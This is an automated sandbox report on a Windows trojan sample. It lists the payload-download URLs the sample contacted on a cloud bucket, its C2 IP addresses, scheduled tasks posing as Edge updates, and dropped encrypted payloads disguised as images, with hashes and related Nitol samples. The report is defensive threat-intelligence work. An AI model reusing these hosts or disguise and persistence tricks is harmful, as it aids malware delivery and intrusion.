http://crl.thawte.com/ThawteTimestampingCA.crl0	2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr	false		high
https://662hfg.oss-cn-beijing.aliyuncs.com/beijing.aliyuncs.com/	2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.symauth.com/rpa00	2976587-987347589.08.exe, 00000000.00000003.1834314308.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833586076.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1834004274.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833758808.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833300955.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833689262.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833937856.0000000008B71000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833452082.0000000008B71000.00000004.00000020.00020000.00000000.sdmp	false		high
https://662hfg.oss-cn-beijing.aliyuncs.com/A5	2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/ip.txt	byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	false		high
https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifp	2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1872658883.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifl	2976587-987347589.08.exe, 00000000.00000003.1811253629.0000000000E76000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.08.exe, 00000000.00000003.1811135077.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/7-2476756634-1003q5W;	2976587-987347589.08.exe, 00000000.00000003.1872724814.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://%s/upx.rar	byHW9q.exe, 0000002A.00000002.3244554396.000000001002D000.00000004.00001000.00020000.00000000.sdmp, byHW9q.exe, 0000002A.00000002.3242107450.0000000003B70000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/b.gifi	2976587-987347589.08.exe, 00000000.00000003.1833372537.0000000000E76000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://662hfg.oss-cn-beijing.aliyuncs.com/pV	2976587-987347589.08.exe, 00000000.00000003.1811326740.0000000000E2A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
39.103.20.105	sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
118.178.60.9	sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
8.217.47.169	unknown	Singapore	45102	CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588718
Start date and time:	2025-01-11 04:42:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 24s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	50
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2976587-987347589.08.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@65/29@12/3
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212, 4.245.163.56
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
03:44:04	Task Scheduler	Run new task: JizGb path: C:\Users\user\Documents\XY3LL0.exe
03:45:13	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 Ez9tE path: C:\Program Files (x86)\byHW9q\byHW9q.exe
03:45:13	Task Scheduler	Run new task: MicrosoftEdgeUpdateTaskUA Task-S-1-5-18 MGJR2 path: C:\Program Files (x86)\x736Pg9\QmbK8U.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
39.103.20.105	2976587-987347589.07.exe	Get hash	malicious	Unknown	Browse
118.178.60.9	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse
	2362476847-83854387.07.exe	Get hash	malicious	Nitol	Browse
	2o63254452-763487230.06.exe	Get hash	malicious	Nitol	Browse
	e2664726330-76546233.05.exe	Get hash	malicious	Nitol	Browse
	23567791246-764698008.02.exe	Get hash	malicious	Unknown	Browse
	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse
	2749837485743-7684385786.05.exe	Get hash	malicious	Unknown	Browse
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse
	45631.exe	Get hash	malicious	Nitol	Browse
8.217.47.169	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse
8.217.47.169	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	of5HklY9qP.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	yMXFgPOdf2.exe	Get hash	malicious	GuLoader	Browse	13.107.246.45
	1dVtYIvfHz.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	FJRUb5lb9m.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	5hD3Yjf7xD.exe	Get hash	malicious	AgentTesla	Browse	13.107.246.45
	02Eh1ah35H.exe	Get hash	malicious	GuLoader	Browse	13.107.246.45
	AJ5zYYsisA.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	1297823757234143258.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	4N4nldx1wW.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com	2976587-987347589.07.exe	Get hash	malicious	Unknown	Browse	39.103.20.105
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse	118.178.60.9
	2362476847-83854387.07.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2o63254452-763487230.06.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	e2664726330-76546233.05.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	23567791246-764698008.02.exe	Get hash	malicious	Unknown	Browse	118.178.60.9
	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse	118.178.60.9
	2749837485743-7684385786.05.exe	Get hash	malicious	Unknown	Browse	118.178.60.9
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse	118.178.60.9
	45631.exe	Get hash	malicious	Nitol	Browse	118.178.60.9

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC	25Lz840Dmh.exe	Get hash	malicious	FormBook	Browse	8.217.17.192
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	47.254.140.255
	FIWszl1A8l.exe	Get hash	malicious	GhostRat	Browse	8.217.85.20
	5.elf	Get hash	malicious	Unknown	Browse	8.209.177.126
	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse	8.217.59.222
	https://199.188.109.181	Get hash	malicious	Unknown	Browse	47.254.187.72
	Fantazy.sh4.elf	Get hash	malicious	Unknown	Browse	8.214.203.178
	6.elf	Get hash	malicious	Unknown	Browse	8.222.188.75
	Benefit_401k_2025_Enrollment.pdf	Get hash	malicious	Unknown	Browse	47.246.158.153
	123.exe	Get hash	malicious	Metasploit	Browse	47.90.142.15
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	2976587-987347589.07.exe	Get hash	malicious	Unknown	Browse	39.103.20.105
	5.elf	Get hash	malicious	Unknown	Browse	139.240.73.120
	4.elf	Get hash	malicious	Unknown	Browse	42.120.233.253
	AuKUol8SPU.exe	Get hash	malicious	FormBook	Browse	8.136.96.106
	frosty.x86.elf	Get hash	malicious	Mirai	Browse	47.110.90.76
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	8.136.96.106
	beacon_x86.exe	Get hash	malicious	CobaltStrike	Browse	8.148.6.140
	beacon_x86.exe	Get hash	malicious	CobaltStrike	Browse	8.148.6.140
	beacon_x64.exe	Get hash	malicious	CobaltStrike	Browse	8.148.6.140
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	2976587-987347589.07.exe	Get hash	malicious	Unknown	Browse	39.103.20.105
	5.elf	Get hash	malicious	Unknown	Browse	139.240.73.120
	4.elf	Get hash	malicious	Unknown	Browse	42.120.233.253
	AuKUol8SPU.exe	Get hash	malicious	FormBook	Browse	8.136.96.106
	frosty.x86.elf	Get hash	malicious	Mirai	Browse	47.110.90.76
	3HnH4uJtE7.exe	Get hash	malicious	FormBook	Browse	8.136.96.106
	beacon_x86.exe	Get hash	malicious	CobaltStrike	Browse	8.148.6.140
	beacon_x86.exe	Get hash	malicious	CobaltStrike	Browse	8.148.6.140
	beacon_x64.exe	Get hash	malicious	CobaltStrike	Browse	8.148.6.140

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	Ntwph4urc1.exe	Get hash	malicious	FormBook, GuLoader	Browse	39.103.20.105 118.178.60.9
	yMXFgPOdf2.exe	Get hash	malicious	GuLoader	Browse	39.103.20.105 118.178.60.9
	2976587-987347589.07.exe	Get hash	malicious	Unknown	Browse	39.103.20.105 118.178.60.9
	yMXFgPOdf2.exe	Get hash	malicious	GuLoader	Browse	39.103.20.105 118.178.60.9
	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	39.103.20.105 118.178.60.9
	LMSxhK1u8Z.exe	Get hash	malicious	GuLoader	Browse	39.103.20.105 118.178.60.9
	ro7eoySJ9q.exe	Get hash	malicious	GuLoader	Browse	39.103.20.105 118.178.60.9
	ro7eoySJ9q.exe	Get hash	malicious	GuLoader	Browse	39.103.20.105 118.178.60.9
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	39.103.20.105 118.178.60.9

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\byHW9q\byHW9q.exe	2873466535874-68348745.02.exe	Get hash	malicious	Unknown	Browse
	2362476847-83854387.07.exe	Get hash	malicious	Nitol	Browse
	2o63254452-763487230.06.exe	Get hash	malicious	Nitol	Browse
	e2664726330-76546233.05.exe	Get hash	malicious	Nitol	Browse
	23567791246-764698008.02.exe	Get hash	malicious	Unknown	Browse
	287438657364-7643738421.08.exe	Get hash	malicious	Nitol	Browse
	2749837485743-7684385786.05.exe	Get hash	malicious	Nitol	Browse
	2749837485743-7684385786.05.exe	Get hash	malicious	Unknown	Browse
	2b687482300.6345827638.08.exe	Get hash	malicious	Unknown	Browse
	45631.exe	Get hash	malicious	Nitol	Browse

Created / dropped Files

C:\Program Files (x86)\byHW9q\byHW9q.exe

Download File

Process:	C:\Users\user\Documents\XY3LL0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 2873466535874-68348745.02.exe, Detection: malicious, Browse Filename: 2362476847-83854387.07.exe, Detection: malicious, Browse Filename: 2o63254452-763487230.06.exe, Detection: malicious, Browse Filename: e2664726330-76546233.05.exe, Detection: malicious, Browse Filename: 23567791246-764698008.02.exe, Detection: malicious, Browse Filename: 287438657364-7643738421.08.exe, Detection: malicious, Browse Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse Filename: 2749837485743-7684385786.05.exe, Detection: malicious, Browse Filename: 2b687482300.6345827638.08.exe, Detection: malicious, Browse Filename: 45631.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\byHW9q\log.src

Download File

Process:	C:\Users\user\Documents\XY3LL0.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.999955224901628
Encrypted:	true
SSDEEP:	98304:ZOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:wo6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	4E69163B33E91E8AFC02DCC72471B2F1
SHA1:	0CE1E72AB343CF33077EAB5B8DBAE7BE96D69D8B
SHA-256:	55E5F32495D2C24BC410DF7F58513450046F67DF90085E85FA36B242FED5E9C7
SHA-512:	4CD2B75264B7F1BADE1B241C75823C350DEFC40D997C441D5CEFD4EF4D75C4D55BC852194682B4AD127B15E4ED07A0D1B8E3ACD01AAD24ACBF38FED9D5964FEA
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\byHW9q\tbcore3U.dll

Download File

Process:	C:\Users\user\Documents\XY3LL0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992517185891377
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/z:9S4+O6P5OeMRrjRy7aPZbm3k8V/z
MD5:	4EA39063E0E7FD0EA51504978B1EFFB4
SHA1:	0E684F63691DBEC13D7EA208F292A58E12CC7FEF
SHA-256:	1527F117A56A63E342CF72449D4CED87D68E805CE0815F52957331FA4556EFE6
SHA-512:	56CA71686409A16957ADC6586B175D93DB3B82B4DC2B43C3118D802AC14DDDD5AF128A5F92D5CDCBE2AF76125929D743FBFC6010FAD99C7905B844AF446E514C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\byHW9q\utils.vcxproj

Download File

Process:	C:\Users\user\Documents\XY3LL0.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.99939971091827
Encrypted:	true
SSDEEP:	6144:WiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:Z8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	A62A705AE11AEB867F5A9435EA8BC787
SHA1:	D5A8292FE93FF636847A12C2CF3B3CF65D9F1DE7
SHA-256:	BCBB6DB9F498F5BA3B969EE64CA3A1F66457C6F17D8A8092E12EBF3EE58E2A1B
SHA-512:	FBD8294C15F1ACE524CC32D7F3B06999F9B66A20C350200575153E37A0B23B041AA404B0D4EFCFB356713B7323DC6AC5C026E51848B626C6E97887B66270E251
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()456789:CDEF8.217.47.169....."ijstuvwxyz....cvqthu.net......3#..............47.169....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Program Files (x86)\x736Pg9\QmbK8U.exe

Download File

Process:	C:\Program Files (x86)\byHW9q\byHW9q.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	54152
Entropy (8bit):	6.64786972992462
Encrypted:	false
SSDEEP:	768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
MD5:	7B6586E21FBC8F2F0BB784A1A8FC65B4
SHA1:	E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
SHA-256:	7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
SHA-512:	E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\x736Pg9\log.src

Download File

Process:	C:\Program Files (x86)\byHW9q\byHW9q.exe
File Type:	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	5059989
Entropy (8bit):	7.999955227306662
Encrypted:	true
SSDEEP:	98304:aOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:1o6T1MFhE/7qJwBP6TWtttriYE7kjv
MD5:	3C9205EAB82B6A2E98CEBE0893C623D6
SHA1:	62A6488EACB2BF4E9C4196414596FAF15EE5B13A
SHA-256:	57BF429F6929E8949E46C3771E20043F4788C3B204CE61740733F7990CEEED92
SHA-512:	5EBA767911302CEF422851B98802BD9701C3608566A1487D01523090FB428049F770A90678973CAA101D952E22B010ECB0860D32AF73D9058D556E65EB61EA50
Malicious:	false
Preview:	.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..l..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....\|]....Ke......G......U..1....#^..1\|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.\|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)....t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...

C:\Program Files (x86)\x736Pg9\tbcore3U.dll

Download File

Process:	C:\Program Files (x86)\byHW9q\byHW9q.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4858192
Entropy (8bit):	7.992516673019125
Encrypted:	true
SSDEEP:	98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/o:9S4+O6P5OeMRrjRy7aPZbm3k8V/o
MD5:	BBFE49A128333183EE39DD0B2824C406
SHA1:	A5C99950B1B4F2FC2C0303092B6FB297D75F3B47
SHA-256:	C855B6CFF6A4B1C470DCB9DBDF19CC4559AD93D8D2DCA0B16F878E92531BBE12
SHA-512:	4544D09385B585657F0FD88265C6CBA0FE6EEA459F369ED3C44C01BEB073C46756CD2B23DD5379102EE35268EC4245B7594A378F80C212E779B9C1AC727727B2
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 78%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....\|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\x736Pg9\utils.vcxproj

Download File

Process:	C:\Program Files (x86)\byHW9q\byHW9q.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
Category:	dropped
Size (bytes):	365477
Entropy (8bit):	7.99939965129237
Encrypted:	true
SSDEEP:	6144:YiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:P8u69CghoQxoMTFQqtKFCG7mbZ
MD5:	7B2273DD374668CA4444D5B7F81D9F7C
SHA1:	E1B74E5857753B996112D6538E1E162905B286FF
SHA-256:	E63B72DA0D99233C46B18154900B282B4E58E70665FCD770D8FCA7B414325FEF
SHA-512:	BB9A053D04ABD91753D377B772652A4C1EAAD57AB6824F0B30A1E2B9E41D74725F33CB19B88D750BEC575C455B87661999E4204BF3DC5CCECDA44E6BFBAAA723
Malicious:	false
Preview:	......JFIF.............ZExif..MM..................J............Q...........Q..........%Q..........%...............C....................................................................C.......p...............................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()456789:CDEF8.217.47.169....."ijstuvwxyz....cvqthu.net......3#..............47.169....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......"..;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{\|}~........=..>.A

C:\Users\Public\Music\destopbak.ini

Download File

Process:	C:\Users\user\Documents\XY3LL0.exe
File Type:	MIPSEB MIPS-III ECOFF executable
Category:	modified
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:s:s
MD5:	7E74F75663E5B5A4F3452A4C603EE45D
SHA1:	D5114B086B721F2C87EA7152025792958AB4C629
SHA-256:	DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
SHA-512:	2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	.@

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\FOM-51[1].jpg

Download File

